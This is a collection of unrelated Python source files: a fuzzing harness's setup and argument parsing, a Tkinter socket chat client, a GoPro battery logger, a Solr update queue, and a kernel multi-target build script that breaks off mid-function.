    # (import_s2e, build_s2e, export_s2e) = ret
    (import_s2e, build_s2e, export_s2e) = (False, False, False)
    # check s2e VM images
    # get_s2e_vm = check_s2e_vm()
    get_s2e_vm = False
    # process afl docker image according to check result
    if import_afl:
        build_or_import(AFLDIR, argv['docker_afl'], True)
    if build_afl:
        build_or_import(AFLDIR, argv['docker_afl'], False)
    if export_afl:
        export_docker_image(argv['docker_afl'], 'afl')
    # process s2e docker image according to check result
    # (currently disabled above, so these branches never fire)
    if import_s2e:
        build_or_import(S2EDIR, argv['docker_s2e'], True)
    if build_s2e:
        build_or_import(S2EDIR, argv['docker_s2e'], False)
    if export_s2e:
        export_docker_image(argv['docker_s2e'], 's2e')
    # process s2e VM images
    if get_s2e_vm:
        print_sep()
        print '[C]: NOW DOWNLOADING S2E VM IMAGE TARBALL'
        vm_path = '{}/vm'.format(S2EDIR)
        file_name = url_get_file(IMAGE_URL, vm_path)
        print_sep()
        print '[C]: EXTRACTING DOWNLOADED FILE'
        unzip(file_name, vm_path)
    # check python packages
    pip_check('psycopg2')
    pip_check('watchdog')
    pip_check('setproctitle')
    pip_check('docker')
    pip_check('psutil')
    pip_check(check='concurrent', install='futures')
    # Make the freshly-installed modules visible as module-level globals
    # (they could not be imported at module load time).
    globals()['docker'] = __import__('docker')
    globals()['setproctitle'] = __import__('setproctitle')
    # check for qemu build (for dynamic basic block coverage)
    curpath = os.path.dirname(os.path.realpath(__file__))
    qemu_1 = '{}/coverage/qemu-x86_64'.format(curpath)
    qemu_2 = '{}/coverage/qemu-i386'.format(curpath)
    if not os.path.isfile(qemu_1) or not os.path.isfile(qemu_2):
        cmd = '{}/coverage/setup.sh'.format(curpath)
        run_command_noret(cmd, debug=True)
    argv['qemu'] = '{}/coverage'.format(curpath)
    print_sep()
    print '[C]: Using docker image [{}] as the afl docker for the test'\
        .format(argv['docker_afl'])
    print '[C]: Using docker image [{}] as the s2e docker for the test'\
        .format(argv['docker_s2e'])
def setup(argv):
    ''' setup

    Standalone setup mode: build, export, and/or import the AFL and S2E
    docker images as selected by the --*_docker flags, then return so the
    program can exit.
    '''
    print '[C]: In setup mode, will exit after setup finished'
    docker_afl = argv['docker_afl']
    docker_s2e = argv['docker_s2e']
    if argv['build_docker']:
        build_or_import(AFLDIR, docker_afl, False)
        build_or_import(S2EDIR, docker_s2e, False)
    if argv['export_docker']:
        # Build first when the image is not present locally.
        if not check_docker_image_exist(docker_afl):
            build_or_import(AFLDIR, docker_afl, False)
        export_docker_image(docker_afl, 'afl')
        if not check_docker_image_exist(docker_s2e):
            build_or_import(S2EDIR, docker_s2e, False)
        export_docker_image(docker_s2e, 's2e')
    if argv['import_docker']:
        build_or_import(AFLDIR, docker_afl, True)
        build_or_import(S2EDIR, docker_s2e, True)
def run_fuzz(argv):
    ''' run the test

    End-to-end entry point: verify requirements, fetch and unpack the target
    tarball, detect its architecture, then hand off to execute() or
    execute_aflonly().
    '''
    # check the requirements of cim_fuzz
    check_req(argv)
    # working directory name (timestamped so runs never collide)
    working_dir = '{}/cb_{}'.format(argv['cbhome'],
                                    str(datetime.now().strftime('%Y-%m-%d-%H%M%S.%f')))
    check_dir(working_dir)
    # 1. download from remote or get the file with path
    file_name = url_get_file(argv['uri'], working_dir)
    # 2. unzip the file
    dir_name = unzip(file_name, working_dir)
    argv['tar_file'] = file_name
    print_sep()
    print '[C]: working directory: [{}]'.format(dir_name)
    # prepare the experiment directory structure
    dir_struct = prepare_dir(dir_name)
    # get the architecture of the test binary (always named 'cb')
    binary = '{}/cb'.format(dir_struct['binary'])
    bin_arch = get_file_arch(binary)[0]
    if bin_arch not in ['32bit', '64bit']:
        print '[C]: unsupported file arch!, exiting now'
        exit(0)
    if bin_arch == '64bit':
        argv['arch'] = 'x86_64'
    if bin_arch == '32bit':
        argv['arch'] = 'i386'
    # first 8 bytes of md5 as file id
    argv['md5sum'] = md5sum(binary)
    argv['fid'] = argv['md5sum'][:8]
    check_dir('{}/{}'.format(dir_struct['out_afl'], argv['fid']))
    print "out_afl:{}/{}".format(dir_struct['out_afl'], argv['fid'])
    # save command to cimfuzz.cmd file
    # (drop the bound handler first -- it is not JSON-serialisable)
    argv.pop('func', None)
    with open('{}/cimfuzz.cmd'.format(dir_name), 'w') as fuzz_cmd:
        json.dump(argv, fuzz_cmd)
    # globals for flask
    if argv['afl_only']:
        execute_aflonly(dir_struct, argv)
    else:
        execute(dir_struct, argv)
def setup_argparse():
    ''' parse arguments

    Two sub-commands: `run` launches a fuzzing campaign and `setup` manages
    the docker images. The selected handler is stored as args.func and
    invoked with the parsed options as a dict.
    '''
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers(dest='command')
    class CheckMinAction(argparse.Action):
        # Enforces a lower bound of 5 for interval-style options.
        def __call__(self, parser, namespace, values, option_string=None):
            if values < 5:
                parser.error("Minimum check interval for {0} is 5".format(option_string))
            setattr(namespace, self.dest, values)
    # command parser for launching fuzz engine
    sub_run = subparsers.add_parser('run')
    sub_run.set_defaults(func=run_fuzz)
    sub_run.add_argument('--cbhome', type=str, default='/opt/exp-data')
    sub_run.add_argument('--num_afl', type=int, default=5)
    sub_run.add_argument('--num_s2e', type=int, default=1)
    sub_run.add_argument('--timeout_afl', type=int, default=0)
    sub_run.add_argument('--timeout_s2e', type=int, default=900)
    sub_run.add_argument('--docker_uid', type=int, default=EUID)
    sub_run.add_argument('--docker_s2e', type=str, default='s2e_afl')
    sub_run.add_argument('--docker_afl', type=str, default='cim_fuzz')
    sub_run.add_argument('--fuzz_lib', action='store_true')
    sub_run.add_argument('--debug', action='store_true')
    sub_run.add_argument('--resume', action='store_true')
    sub_run.add_argument('--uri', type=str,
                         help='The uri of the test archive, should be a .tar.gz or .tgz')
    sub_run.add_argument('--mode_afl', type=str, choices=['qemu', 'normal'], default='qemu')
    sub_run.add_argument('--num_master', type=int, default=None)
    sub_run.add_argument('--s2e_check_interval', type=int, action=CheckMinAction, default=10)
    sub_run.add_argument('--s2e_launch_threshold', type=int, default=4)
    sub_run.add_argument('--s2e_mem_limit', type=int, default=10*1024*1024*1024)
    sub_run.add_argument('--max_testcase_size', type=int, default=50*1024*1024)
    sub_run.add_argument('--cfg', type=str)
    # Postgres connection options.
    sub_run.add_argument('--database', type=str, default='cyimmu')
    sub_run.add_argument('--user', type=str, default='postgres')
    sub_run.add_argument('--password', type=str, default='postgres')
    sub_run.add_argument('--host', type=str, default='127.0.0.1')
    sub_run.add_argument('--port', type=int, default=5432)
    sub_run.add_argument('--afl_only', action='store_true')
    # command parser for setup fuzz engine
    sub_setup = subparsers.add_parser('setup')
    sub_setup.set_defaults(func=setup)
    sub_setup.add_argument('--build_docker', action='store_true')
    sub_setup.add_argument('--export_docker', action='store_true')
    sub_setup.add_argument('--import_docker', action='store_true')
    sub_setup.add_argument('--docker_s2e', type=str, default='s2e_afl')
    sub_setup.add_argument('--docker_afl', type=str, default='cim_fuzz')
    sub_setup.add_argument('--debug', action='store_true')
    args = parser.parse_args()
    kwargs = vars(args)
    # Setup mode requires at least one action flag.
    if args.command == 'setup' and \
            not(args.build_docker or args.export_docker or args.import_docker):
        sub_setup.print_help()
        print '\nAt least one operation is needed in setup mode'
        exit(0)
    args.func(kwargs)


if __name__ == "__main__":
    setup_argparse()
|
client.py | # Class: CS544
# Date : 13 March, 2020
# Purpose: Implementing client logic
from socket import AF_INET, socket, SOCK_STREAM #python package for importing TCP sockets
from threading import Thread
import tkinter #python library for UI used in the chat
from datetime import datetime #python package for datetime
import time
from hashlib import md5 #python package for hashcode
# STATEFUL
#Handles receiving of messages
def receive():
    """Receive messages from the server and display them until the socket closes.

    Runs on a background thread. A "{exit}" payload from the server signals a
    rejected login: show the error, close the socket, and stop the UI loop.
    """
    while True:
        try:
            msg = client_socket.recv(BUFSIZ).decode("utf8")
            msg = original_msg(msg)
            if msg == "{exit}":
                # BUG FIX: the console message was missing its leading "I".
                print("Invalid User/ Password")
                msg_list.insert(tkinter.END, "Invalid User/ Password")
                time.sleep(2)
                client_socket.close()
                top.quit()
                # BUG FIX: stop the loop here instead of inserting "{exit}"
                # into the chat list and then recv()-ing on a closed socket.
                return
            msg_list.insert(tkinter.END, msg)
        except OSError:  # socket was closed
            break
#Handles sending of messages
def send(event=None):
    """Read the message from the UI entry field, frame it, and transmit it.

    Bound both to the <Return> key and the Send button. A "{exit}" message
    also closes the socket and shuts the UI down.
    """
    raw_msg = my_msg.get()
    framed = add_header(raw_msg)
    my_msg.set("")  # clear the input field in the UI
    client_socket.send(bytes(framed, "utf8"))
    if raw_msg == "{exit}":
        client_socket.close()
        top.quit()
#Handles closing chat when user clicks close button in UI
def on_closing(event=None):
    """Window-close handler: send the "{exit}" sentinel so the server and
    UI shut down cleanly (send() closes the socket and quits the loop)."""
    my_msg.set("{exit}")
    send()
#Adding Header
def add_header(raw_msg):
    """Frame *raw_msg* with the protocol header, '¦¦'-delimited.

    Field layout: version ¦¦ HH:MM:SS timestamp ¦¦ length ¦¦ reserved bits
    ¦¦ payload ¦¦ md5 digest of the payload.
    """
    timestamp = datetime.now().strftime("%H:%M:%S")
    fields = [
        '0',                        # protocol version
        timestamp,
        str(len(raw_msg)),
        '8',                        # reserved bits
        str(raw_msg),
        handle_md5hash(raw_msg),    # integrity check
    ]
    return '¦¦'.join(fields)
#Seperating Header and message
def original_msg(h_msg):
    """Strip the protocol header from *h_msg* and return the payload,
    which sits in the second-to-last '¦¦'-delimited field."""
    fields = h_msg.split('¦¦')
    return fields[len(fields) - 2]
#Function that generates hash code for message
def handle_md5hash(msg):
    """Return the hex MD5 digest of *msg*, used as a message integrity check."""
    return md5(msg.encode()).hexdigest()
# STATEFUL
# Implementing UI for the protocol using Python's built-in Tkinter package
top = tkinter.Tk()
top.title("Chat Screen")
messages_frame = tkinter.Frame(top)
my_msg = tkinter.StringVar()  # variable bridging the entry field and send()
my_msg.set("Type your messages here.")
scrollbar = tkinter.Scrollbar(messages_frame)  # Scroll bar to navigate.
# Listbox that displays the received/sent messages.
msg_list = tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = tkinter.Entry(top, textvariable=my_msg)
entry_field.bind("<Return>", send)  # Enter key also sends
entry_field.pack()
send_button = tkinter.Button(top, text="Send", command=send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)  # window close -> graceful exit
# UI part ends
# Requesting host IP from client
HOST = input('Enter host: ')  # CLIENT
# Port number of the server
PORT = 3300
BUFSIZ = 1024  # socket receive buffer size
ADDR = (HOST, PORT)
# creating client socket
client_socket = socket(AF_INET, SOCK_STREAM)
client_socket.connect(ADDR)
# Receiver runs on its own thread so the UI stays responsive.
receive_thread = Thread(target=receive)
receive_thread.start()
tkinter.mainloop()  # invoking UI for chat; blocks until top.quit()
log_battery.py | # log_battery.py/Open GoPro, Version 2.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Wed, Sep 1, 2021 5:05:45 PM
"""Example to continuously read the battery (with no Wifi connection)"""
import csv
import time
import logging
import argparse
import threading
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass
from typing import Optional, Tuple, Literal, List
from rich.console import Console
from open_gopro import GoPro
from open_gopro.constants import StatusId
from open_gopro.util import setup_logging, set_logging_level
logger = logging.getLogger(__name__)
console = Console() # rich consoler printer
BarsType = Literal[0, 1, 2, 3]
@dataclass
class Sample:
    """A single battery reading with an auto-assigned creation timestamp."""

    index: int       # sequence number of this sample
    percentage: int  # battery charge in percent
    bars: BarsType   # coarse battery level reported by the camera (0-3 bars)

    def __post_init__(self) -> None:
        # Timestamp the sample at creation so CSV output can report elapsed time.
        self.time = datetime.now()

    def __str__(self) -> str:  # pylint: disable=missing-return-doc
        return f"Index {self.index} @ time {self.time.strftime('%H:%M:%S')} --> bars: {self.bars}, percentage: {self.percentage}"
# Shared accumulator state: written by either the notification thread or the
# polling loop in main(), read by dump_results_as_csv().
SAMPLE_INDEX = 0
SAMPLES: List[Sample] = []
def dump_results_as_csv(location: Path) -> None:
    """Write all of the samples to a csv file

    Columns are: sample index, seconds elapsed since the first sample,
    battery percentage, battery bars.

    Args:
        location (Path): File to write to
    """
    console.print(f"Dumping results as CSV to {location}")
    # newline="" is required by the csv module so it controls row terminators
    # itself; without it, Windows output gets doubled \r\r\n line endings.
    with open(location, mode="w", newline="") as f:
        w = csv.writer(f, delimiter=",", quotechar='"', quoting=csv.QUOTE_MINIMAL)
        w.writerow(["index", "time", "percentage", "bars"])
        initial_time = SAMPLES[0].time
        for s in SAMPLES:
            w.writerow([s.index, (s.time - initial_time).seconds, s.percentage, s.bars])
def process_battery_notifications(gopro: GoPro, initial_bars: BarsType, initial_percentage: int) -> None:
    """Separate thread to continuously check for and store battery notifications.

    If the CLI parameter was set to poll, this isn't used.

    Args:
        gopro (GoPro): instance to get updates from
        initial_bars (BarsType): Initial bars level when notifications were enabled
        initial_percentage (int): Initial percentage when notifications were enabled
    """
    global SAMPLE_INDEX
    global SAMPLES
    # A notification may carry only one of the two statuses, so the other
    # value is carried forward from the previous sample.
    last_percentage = initial_percentage
    last_bars = initial_bars
    while True:
        # Block until we receive an update
        notification = gopro.get_update()
        # Update data points if they have changed
        last_percentage = (
            notification.data[StatusId.INT_BATT_PER]
            if StatusId.INT_BATT_PER in notification.data
            else last_percentage
        )
        last_bars = (
            notification.data[StatusId.BATT_LEVEL] if StatusId.BATT_LEVEL in notification.data else last_bars
        )
        # Append and print sample
        SAMPLES.append(Sample(index=SAMPLE_INDEX, percentage=last_percentage, bars=last_bars))
        console.print(str(SAMPLES[-1]))
        SAMPLE_INDEX += 1
def main() -> int:
    """Main program functionality: sample the battery until the camera dies.

    Uses asynchronous status notifications when no poll interval was given,
    otherwise polls at the requested interval. On exit (error, keyboard
    interrupt, or camera death) the collected samples are dumped to CSV.

    Returns:
        int: program return code (0 on success, 1 on error)
    """
    identifier, log_location, poll = parse_arguments()
    global logger
    logger = setup_logging(logger, log_location)
    global SAMPLE_INDEX
    global SAMPLES
    gopro: Optional[GoPro] = None
    return_code = 0
    try:
        with GoPro(identifier, enable_wifi=False) as gopro:
            set_logging_level(logger, logging.ERROR)
            # Setup notifications if we are not polling
            if poll is None:
                console.print("Configuring battery notifications...")
                # Enable notifications of the relevant battery statuses. Also store initial values.
                bars = gopro.ble_status.batt_level.register_value_update().flatten
                percentage = gopro.ble_status.int_batt_per.register_value_update().flatten
                # Start a thread to handle asynchronous battery level notifications
                threading.Thread(
                    target=process_battery_notifications, args=(gopro, bars, percentage), daemon=True
                ).start()
                with console.status("[bold green]Receiving battery notifications until it dies..."):
                    # Sleep forever, allowing notification handler thread to deal with battery level notifications
                    while True:
                        time.sleep(1)
            # Otherwise, poll
            else:
                with console.status("[bold green]Polling the battery until it dies..."):
                    while True:
                        SAMPLES.append(
                            Sample(
                                index=SAMPLE_INDEX,
                                percentage=gopro.ble_status.int_batt_per.get_value().flatten,
                                bars=gopro.ble_status.batt_level.get_value().flatten,
                            )
                        )
                        console.print(str(SAMPLES[-1]))
                        SAMPLE_INDEX += 1
                        time.sleep(poll)
    except Exception as e:  # pylint: disable=broad-except
        logger.error(repr(e))
        return_code = 1
    except KeyboardInterrupt:
        logger.warning("Received keyboard interrupt. Shutting down...")
    finally:
        # Always persist whatever was collected before closing the connection.
        if len(SAMPLES) > 0:
            csv_location = Path(log_location.parent) / "battery_results.csv"
            dump_results_as_csv(csv_location)
        if gopro is not None:
            gopro.close()
        console.print("Exiting...")
        return return_code  # pylint: disable=lost-exception
def parse_arguments() -> Tuple[str, Path, Optional[int]]:
    """Parse command line arguments

    Returns:
        Tuple[str, Path, Optional[int]]: (identifier, path to save log,
        poll interval in seconds, or None to use notifications instead)
    """
    parser = argparse.ArgumentParser(
        description="Connect to the GoPro via BLE only and continuously read the battery (either by polling or notifications)."
    )
    parser.add_argument(
        "-i",
        "--identifier",
        type=str,
        help="Last 4 digits of GoPro serial number, which is the last 4 digits of the default camera SSID. \
            If not used, first discovered GoPro will be connected to",
        default=None,
    )
    parser.add_argument(
        "-l",
        "--log",
        type=Path,
        help="Location to store detailed log",
        default="log_battery.log",
    )
    parser.add_argument(
        "-p",
        "--poll",
        type=int,
        help="Set to poll the battery at a given interval. If not set, battery level will be notified instead. Defaults to notifications.",
        default=None,
    )
    args = parser.parse_args()
    return args.identifier, args.log, args.poll
if __name__ == "__main__":
    main()  # CLI entry point
|
solrqueue.py | from datetime import datetime
import logging
from queue import Empty, Full, Queue
import threading
from haystack.utils import get_identifier
from api_v2.search.index import TxnAwareSearchIndex
LOGGER = logging.getLogger(__name__)
class SolrQueue:
    """Batches solr index updates/removals onto a background worker thread.

    Producers call add()/delete(); the worker drains the queue at least every
    5 seconds (or immediately after trigger()) and coalesces consecutive
    entries for the same (index, connection, operation) into one backend call.
    """

    def __init__(self):
        self._queue = Queue()              # pending (index_cls, using, ids, delete-flag) tuples
        self._prev_queue = None            # backend queue we replaced; restored on __exit__
        self._stop = threading.Event()     # tells the worker thread to exit
        self._thread = None
        self._trigger = threading.Event()  # wakes the worker for an immediate drain

    def add(self, index_cls, using, instances):
        """Queue *instances* for (re)indexing via *index_cls* on connection *using*."""
        ids = [instance.id for instance in instances]
        LOGGER.debug("Solr queue add %s", ids)
        try:
            self._queue.put((index_cls, using, ids, 0))
        except Full:
            LOGGER.warning("Solr queue full")

    def delete(self, index_cls, using, instances):
        """Queue *instances* for removal from the index."""
        ids = [get_identifier(instance) for instance in instances]
        LOGGER.debug("Solr queue delete %s", ids)
        try:
            self._queue.put((index_cls, using, ids, 1))
        except Full:
            LOGGER.warning("Solr queue full")

    def setup(self, app=None):
        """Install this queue as the search-index backend; optionally bind to an aiohttp app."""
        if app:
            app["solrqueue"] = self
            app.on_startup.append(self.app_start)
            app.on_cleanup.append(self.app_stop)
        self._prev_queue = TxnAwareSearchIndex._backend_queue
        TxnAwareSearchIndex._backend_queue = self

    async def app_start(self, _app=None):
        self.start()

    async def app_stop(self, _app=None):
        self.stop()

    def __enter__(self):
        self.setup()
        self.start()
        return self

    def __exit__(self, type, value, tb):
        # if handling exception, don't wait for worker thread
        self.stop(not type)
        TxnAwareSearchIndex._backend_queue = self._prev_queue

    def start(self):
        """Start the background drain thread."""
        self._thread = threading.Thread(target=self._run)
        self._thread.start()

    def stop(self, join=True):
        """Signal the worker to exit (after a final drain) and optionally join it."""
        self._stop.set()
        self._trigger.set()
        if join:
            self._thread.join()

    def trigger(self):
        """Request an immediate drain instead of waiting for the 5s timer."""
        self._trigger.set()

    def _run(self):
        # Worker loop: drain on trigger, or at least every 5 seconds.
        while True:
            self._trigger.wait(5)
            # BUGFIX: reset the trigger each cycle. Previously the event was
            # never cleared, so after the first trigger() every wait(5)
            # returned immediately and the loop degraded into a busy poll.
            self._trigger.clear()
            self._drain()
            if self._stop.is_set():
                return

    def _drain(self):
        """Empty the queue, merging consecutive same-(index, using, op) batches."""
        last_index = None
        last_using = None
        last_del = 0
        last_ids = set()
        while True:
            try:
                index_cls, using, ids, delete = self._queue.get_nowait()
            except Empty:
                index_cls = None  # sentinel: flush the pending batch, then stop
            if last_index and last_index == index_cls and last_using == using and last_del == delete:
                # Same target and operation as the previous entry: merge the ids.
                last_ids.update(ids)
            else:
                if last_index:
                    if last_del:
                        self.remove(last_index, last_using, last_ids)
                    else:
                        self.update(last_index, last_using, last_ids)
                if not index_cls:
                    break
                last_index = index_cls
                last_using = using
                last_del = delete
                last_ids = set(ids)

    def update(self, index_cls, using, ids):
        """Re-index the rows with the given *ids*."""
        index = index_cls()
        backend = index.get_backend(using)
        if backend is not None:
            LOGGER.debug("Updating %d row(s) in solr queue: %s", len(ids), ids)
            rows = index.index_queryset(using).filter(id__in=ids)
            backend.update(index, rows)

    def remove(self, index_cls, using, ids):
        """Delete the given *ids* from the index."""
        index = index_cls()
        backend = index.get_backend(using)
        if backend is not None:
            LOGGER.debug("Removing %d row(s) in solr queue: %s", len(ids), ids)
            # backend.remove has no support for a list of IDs
            backend.conn.delete(id=ids)
|
build-all.py | #! /usr/bin/env python2
# Copyright (c) 2009-2015, 2017, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
from collections import namedtuple
import glob
from optparse import OptionParser
import os
import re
import shutil
import subprocess
import sys
import threading
import Queue
# Build configuration shared across this module.
version = 'build-all.py, version 1.99'
build_dir = '../all-kernels'                   # where per-target build trees and logs go
make_command = ["vmlinux", "modules", "dtbs"]  # default make targets
all_options = {}                               # replaced by the parsed options in main()
compile64 = os.environ.get('CROSS_COMPILE64')  # cross-compiler prefix for arm64 targets
clang_bin = os.environ.get('CLANG_BIN')        # clang binary passed to make as REAL_CC
def error(msg):
    """Write a formatted error message to stderr without terminating."""
    text = "error: %s\n" % msg
    sys.stderr.write(text)
def fail(msg):
    """Fail with a user-printed message"""
    error(msg)   # report to stderr first
    sys.exit(1)  # then abort with a non-zero status
# Hard requirement at import time: the 32-bit cross-compiler prefix must be set.
if not os.environ.get('CROSS_COMPILE'):
    fail("CROSS_COMPILE must be set in the environment")
def check_kernel():
    """Ensure that PWD is a kernel directory"""
    # A kernel source tree always has a MAINTAINERS file at its root.
    if os.path.isfile('MAINTAINERS'):
        return
    fail("This doesn't seem to be a kernel dir")
def check_build():
    """Ensure that the build directory is present."""
    # BUGFIX: errno was referenced below but never imported anywhere in this
    # file, so the EEXIST check raised NameError instead of being tolerant.
    import errno
    if not os.path.isdir(build_dir):
        try:
            os.makedirs(build_dir)
        except OSError as exc:
            # Another process may have created the directory between the
            # isdir() check and makedirs(); that is fine.
            if exc.errno == errno.EEXIST:
                pass
            else:
                raise
# Names of targets that failed to build (informational).
failed_targets = []

# status: short name of the failed sequence, or None on success;
# messages: the captured log lines for that sequence.
BuildResult = namedtuple('BuildResult', ['status', 'messages'])
class BuildSequence(namedtuple('BuildSequence', ['log_name', 'short_name', 'steps'])):
    """One independent build: an ordered list of steps plus its log file."""

    def set_width(self, width):
        # Column width used to align the short name in interleaved output.
        self.width = width

    def __enter__(self):
        # Opens the per-sequence log file; note it does not return self,
        # so it is used as `with seq:` rather than `with seq as ...`.
        self.log = open(self.log_name, 'w')

    def __exit__(self, type, value, traceback):
        self.log.close()

    def run(self):
        """Run every step in order; store a BuildResult in self.status.

        status.status is the short name on failure, None on success.
        """
        self.status = None
        messages = ["Building: " + self.short_name]
        def printer(line):
            # Prefix each line with the aligned target name and mirror it to the log.
            text = "[%-*s] %s" % (self.width, self.short_name, line)
            messages.append(text)
            self.log.write(text)
            self.log.write('\n')
        for step in self.steps:
            st = step.run(printer)
            if st:
                # The first failing step aborts the whole sequence.
                self.status = BuildResult(self.short_name, messages)
                break
        if not self.status:
            self.status = BuildResult(None, messages)
class BuildTracker:
    """Manages all of the steps necessary to perform a build.  The
    build consists of one or more sequences of steps.  The different
    sequences can be processed independently, while the steps within a
    sequence must be done in order."""

    def __init__(self, parallel_builds):
        self.sequence = []
        self.lock = threading.Lock()  # serializes console output
        self.parallel_builds = parallel_builds  # size of the token pool below

    def add_sequence(self, log_name, short_name, steps):
        self.sequence.append(BuildSequence(log_name, short_name, steps))

    def longest_name(self):
        # Longest short name; used to align the per-target log columns.
        longest = 0
        for seq in self.sequence:
            longest = max(longest, len(seq.short_name))
        return longest

    def __repr__(self):
        return "BuildTracker(%s)" % self.sequence

    def run_child(self, seq):
        # Worker thread body: take a token (bounds concurrency), run the
        # sequence, publish its status, then return the token.
        seq.set_width(self.longest)
        tok = self.build_tokens.get()
        with self.lock:
            print "Building:", seq.short_name
        with seq:
            seq.run()
        self.results.put(seq.status)
        self.build_tokens.put(tok)

    def run(self):
        """Start one thread per sequence, limited by a pool of build tokens."""
        self.longest = self.longest_name()
        self.results = Queue.Queue()
        children = []
        errors = []
        self.build_tokens = Queue.Queue()
        nthreads = self.parallel_builds
        print "Building with", nthreads, "threads"
        # Seed the token pool: only `nthreads` children can build at once.
        for i in range(nthreads):
            self.build_tokens.put(True)
        for seq in self.sequence:
            child = threading.Thread(target=self.run_child, args=[seq])
            children.append(child)
            child.start()
        # Collect one result per child, printing logs in verbose mode.
        for child in children:
            stats = self.results.get()
            if all_options.verbose:
                with self.lock:
                    for line in stats.messages:
                        print line
                    sys.stdout.flush()
            if stats.status:
                errors.append(stats.status)
        for child in children:
            child.join()
        if errors:
            fail("\n ".join(["Failed targets:"] + errors))
class PrintStep:
    """A build step that only emits a fixed message to the log printer."""

    def __init__(self, message):
        self.message = message

    def run(self, outp):
        """Send the stored message to *outp*; returns None (success)."""
        outp(self.message)
class MkdirStep:
    """A build step that creates a single directory."""

    def __init__(self, direc):
        self.direc = direc

    def run(self, outp):
        """Log and create the directory; propagates OSError on failure."""
        path = self.direc
        outp("mkdir %s" % path)
        os.mkdir(path)
class RmtreeStep:
    """A build step that recursively deletes a directory tree, ignoring errors."""

    def __init__(self, direc):
        self.direc = direc

    def run(self, outp):
        """Log and remove the tree; missing paths are silently tolerated."""
        target = self.direc
        outp("rmtree %s" % target)
        shutil.rmtree(target, ignore_errors=True)
class CopyfileStep:
    """A build step that copies one file's contents to another path."""

    def __init__(self, src, dest):
        self.src = src
        self.dest = dest

    def run(self, outp):
        """Log and copy the file contents (no metadata) from src to dest."""
        source, target = self.src, self.dest
        outp("cp %s %s" % (source, target))
        shutil.copyfile(source, target)
class ExecStep:
    """A build step that runs an external command, streaming its merged
    stdout/stderr through the log printer line by line."""

    def __init__(self, cmd, **kwargs):
        self.cmd = cmd        # argv list for Popen
        self.kwargs = kwargs  # extra Popen keyword arguments (e.g. env=)

    def run(self, outp):
        """Run the command; return a truthy tuple on non-zero exit, else None."""
        outp("exec: %s" % (" ".join(self.cmd),))
        with open('/dev/null', 'r') as devnull:
            # stderr is folded into stdout so the log captures everything in order.
            proc = subprocess.Popen(self.cmd, stdin=devnull,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.STDOUT,
                                    **self.kwargs)
            stdout = proc.stdout
            while True:
                line = stdout.readline()
                if not line:
                    break
                line = line.rstrip('\n')
                outp(line)
            result = proc.wait()
            if result != 0:
                # Any truthy return value tells BuildSequence.run the step failed.
                return ('error', result)
            else:
                return None
class Builder():
    """Describes how to configure and build one kernel target."""

    def __init__(self, name, defconfig):
        self.name = name
        self.defconfig = defconfig
        # Config name relative to the arch configs directory (what make expects).
        self.confname = re.sub('arch/arm[64]*/configs/', '', self.defconfig)

        # Determine if this is a 64-bit target based on the location
        # of the defconfig.
        self.make_env = os.environ.copy()
        if "/arm64/" in defconfig:
            if compile64:
                self.make_env['CROSS_COMPILE'] = compile64
            else:
                fail("Attempting to build 64-bit, without setting CROSS_COMPILE64")
            self.make_env['ARCH'] = 'arm64'
        else:
            self.make_env['ARCH'] = 'arm'
        # Keep generated configs reproducible across rebuilds.
        self.make_env['KCONFIG_NOTIMESTAMP'] = 'true'
        self.log_name = "%s/log-%s.log" % (build_dir, self.name)

    def build(self):
        """Return the ordered list of step objects that build this target."""
        steps = []
        dest_dir = os.path.join(build_dir, self.name)
        log_name = "%s/log-%s.log" % (build_dir, self.name)
        steps.append(PrintStep('Building %s in %s log %s' %
                               (self.name, dest_dir, log_name)))
        if not os.path.isdir(dest_dir):
            steps.append(MkdirStep(dest_dir))
        defconfig = self.defconfig
        dotconfig = '%s/.config' % dest_dir        # NOTE(review): unused in this method
        savedefconfig = '%s/defconfig' % dest_dir  # NOTE(review): unused in this method
        staging_dir = 'install_staging'
        modi_dir = '%s' % staging_dir
        hdri_dir = '%s/usr' % staging_dir
        steps.append(RmtreeStep(os.path.join(dest_dir, staging_dir)))
        # First configure the tree for this target...
        steps.append(ExecStep(['make', 'O=%s' % dest_dir,
                               self.confname], env=self.make_env))
        # Build targets can be dependent upon the completion of
        # previous build targets, so build them one at a time.
        cmd_line = ['make',
                    'INSTALL_HDR_PATH=%s' % hdri_dir,
                    'INSTALL_MOD_PATH=%s' % modi_dir,
                    'O=%s' % dest_dir,
                    'REAL_CC=%s' % clang_bin]
        build_targets = []
        for c in make_command:
            # Flags (-j4, --foo) are appended to the command line; anything
